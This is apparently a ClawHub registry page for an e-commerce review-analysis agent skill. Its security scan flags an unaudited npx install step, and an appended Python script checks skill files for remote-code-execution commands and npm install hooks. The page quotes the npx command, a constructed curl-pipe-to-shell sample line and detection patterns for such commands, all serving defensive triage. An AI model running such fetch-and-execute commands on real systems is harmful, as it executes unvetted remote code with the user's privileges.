Skill flagged — suspicious patterns detected

ClawHub Security flagged this skill as suspicious. Review the scan results before using.

Product Review Analysis

v1.0.0

Analyze product reviews across any e-commerce platform. Extract actionable insights from customer feedback including pain points, praise patterns, feature re...

0 · 57 · 0 current · 0 all-time
by nexscope-ai @nexscope
License: MIT-0 · Free to use, modify, and redistribute. No attribution required.
Security Scan
VirusTotal: Benign (report available)
OpenClaw: Suspicious (medium confidence)
[!] Purpose & Capability
The skill claims a 'multi-platform review aggregation framework' (Amazon, Etsy, Shopify, etc.) but the registry lists no required environment variables, no API keys, and no code. It's unclear how the skill would legitimately collect reviews from those platforms without user-provided data or platform credentials. This mismatch between capability claims and requested access is a red flag.
Instruction Scope
SKILL.md limits runtime behavior to collecting context from the user's message and asking one follow-up question, then to 'research and analyze using the frameworks and methodology below', but the methodological details are absent. The instructions are vague and could lead the agent to do broad external research or web scraping unless it is constrained. The file does not instruct the agent to read local files or environment variables, which is good, but its ambiguity leaves the agent wide discretion.
[!] Install Mechanism
Although the registry contains no install spec and no code files, SKILL.md includes an 'Install' command using npx: 'npx skills add nexscope-ai/eCommerce-Skills --skill product-review-analysis -g'. That suggests the real functionality comes from an external package fetched and executed at install time. npx resolves the named package from the npm registry and runs it locally with the installing user's privileges, and any install-time scripts it or its dependencies declare run without a prompt; the registry should declare that dependency rather than leave it to a command in prose. The lack of a formal install spec in the manifest combined with a recommended npx install is inconsistent and increases risk.
[!] Credentials
For the stated capabilities (aggregating reviews across multiple e-commerce platforms), one would normally expect the skill to request platform API keys or explicit instructions to upload review data. The skill requests no environment variables or credentials, which is disproportionate to its claimed scope and leaves unclear whether the user must supply sensitive account credentials or raw review exports manually.
Persistence & Privilege
The skill does not request persistent presence (always: false), does not declare config path access, and contains no code files in the registry. There is no indication it will modify other skills or system-wide settings. Persistence/privilege level appears appropriate for an instruction-only skill.
What to consider before installing
This skill claims to aggregate reviews from multiple platforms, but the manifest provides no code or credentials and only suggests running an external 'npx' command to install additional code. Before installing or running it:
(1) Inspect the referenced repo/package (nexscope-ai/eCommerce-Skills) on GitHub/npm to review its code, its dependencies, and any install-time scripts (package.json preinstall/install/postinstall) it would run.
(2) Don't run npx commands you haven't audited: npx downloads and executes remote code.
(3) Ask the developer how the skill fetches platform data and whether you will need to provide API keys or upload your reviews manually.
(4) If you must share reviews, prefer uploading exports rather than supplying account credentials.
(5) If you want safe behavior, request that the skill be updated to declare its install spec and any required env vars explicitly in the registry.
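To act on points (1) and (2) before executing anything, here is an added example of a small pre-install triage script. It is not part of the ClawHub page, the OpenClaw scanner, or the nexscope-ai project. It flags lines in a SKILL.md that fetch and execute remote code in one step, and lists the npm lifecycle hooks in a package.json that run automatically during install. Both sample inputs are constructed for illustration: the SKILL.md fragment repeats the npx line quoted in the scan and adds a pipe-to-shell line to show that pattern, and the package.json is invented and says nothing about the real package.

```python
import json
import re
from typing import Dict, List

# npm runs these scripts automatically when a package is installed. They execute
# arbitrary shell with the installing user's privileges, so read them before installing.
NPM_INSTALL_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Command shapes that download code and execute it in one step.
# Triage heuristics, not a complete list of risky commands.
REMOTE_EXEC_PATTERNS = {
    "npx": re.compile(r"\bnpx\s+\S"),
    "pipe-to-shell": re.compile(r"\b(curl|wget)\b.*\|\s*(sudo\s+)?(ba|z)?sh\b"),
    "pip-from-vcs": re.compile(r"\bpip3?\s+install\b.*\bgit\+"),
}


def find_remote_exec_commands(skill_md: str) -> List[Dict[str, object]]:
    """Return every line of a SKILL.md that matches a remote-code-execution pattern."""
    findings = []
    for lineno, line in enumerate(skill_md.splitlines(), start=1):
        for kind, pattern in REMOTE_EXEC_PATTERNS.items():
            if pattern.search(line):
                findings.append({"line": lineno, "kind": kind, "text": line.strip()})
    return findings


def find_install_hooks(package_json: str) -> Dict[str, str]:
    """Return the lifecycle scripts in a package.json that npm runs without asking."""
    scripts = json.loads(package_json).get("scripts", {})
    return {name: cmd for name, cmd in scripts.items() if name in NPM_INSTALL_HOOKS}


def audit(skill_md: str, package_json: str) -> Dict[str, object]:
    """Combine both checks into a verdict for a human reviewer; it never runs anything."""
    commands = find_remote_exec_commands(skill_md)
    hooks = find_install_hooks(package_json)
    verdict = "manual review required" if commands or hooks else "no install-time execution found"
    return {"remote_exec_commands": commands, "install_hooks": hooks, "verdict": verdict}


# Constructed sample SKILL.md fragment (the npx line is the one quoted in the scan;
# the curl line is added here only to exercise the pipe-to-shell pattern).
SAMPLE_SKILL_MD = """# Product Review Analysis

## Install
Run `npx skills add nexscope-ai/eCommerce-Skills --skill product-review-analysis -g`

## Optional tooling
curl -fsSL https://example.invalid/setup.sh | sh
"""

# Constructed sample package.json: invented for illustration, not the real package.
SAMPLE_PACKAGE_JSON = json.dumps({
    "name": "example-skill-installer",
    "version": "0.0.1",
    "scripts": {
        "postinstall": "node scripts/setup.js",
        "test": "node --test",
    },
})

if __name__ == "__main__":
    print(json.dumps(audit(SAMPLE_SKILL_MD, SAMPLE_PACKAGE_JSON), indent=2))
```

To obtain a real package.json without executing anything, `npm pack <package>` downloads only the tarball (list it with `tar -tzf`), and `npm view <package> scripts` prints the scripts field from the registry metadata. `npm install --ignore-scripts` suppresses the hooks at install time, but it is no substitute for reading them, since the package's runtime code still executes when the skill is used.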


latest: vk97fzf3pbc8e842fs7jygb9ffh83nfz2
